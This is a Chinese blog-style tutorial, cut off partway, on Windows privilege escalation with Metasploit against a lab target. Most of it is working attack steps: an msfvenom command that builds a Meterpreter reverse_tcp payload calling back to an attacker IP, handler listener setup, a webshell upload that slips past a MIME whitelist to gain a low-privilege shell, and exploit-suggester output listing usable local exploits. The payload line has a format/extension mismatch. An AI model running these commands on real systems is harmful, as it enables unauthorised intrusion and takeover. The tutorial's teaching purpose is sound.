本文介绍了如何结合MSF(Metasploit Framework)进行Windows系统的权限提升,包括使用local_exploit_suggester模块进行漏洞审计,通过上传exploit获取低权限shell,以及测试不同提权模块。同时,还详细讲解了利用Python编写的Windows-Exploit-Suggester工具进行补丁审计,找出可能的提权漏洞,并在靶机上测试了ms15-051的两个exp。
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
一、MSF 结合漏洞审计工具进行提权
1、MSF漏洞审计模块:local_exploit_suggeste
(1)生成攻击载核:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.97.130 lport=12345 -f php > 64.exe
(2)msf开启监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.97.130
set lport 12345
exploit
(3)利用文件上传的MIME白名单类型突破,上传了up.aspx大马,然后上传64.exe并执行,后得到一个低权限的shell:
(4)当前session下执行漏洞检测模块:
run post/multi/recon/local_exploit_suggester #这里没有扫描到漏洞,可以换个方法扫描
[+] 192.168.97.131 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.97.131 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.97.131 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 1
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
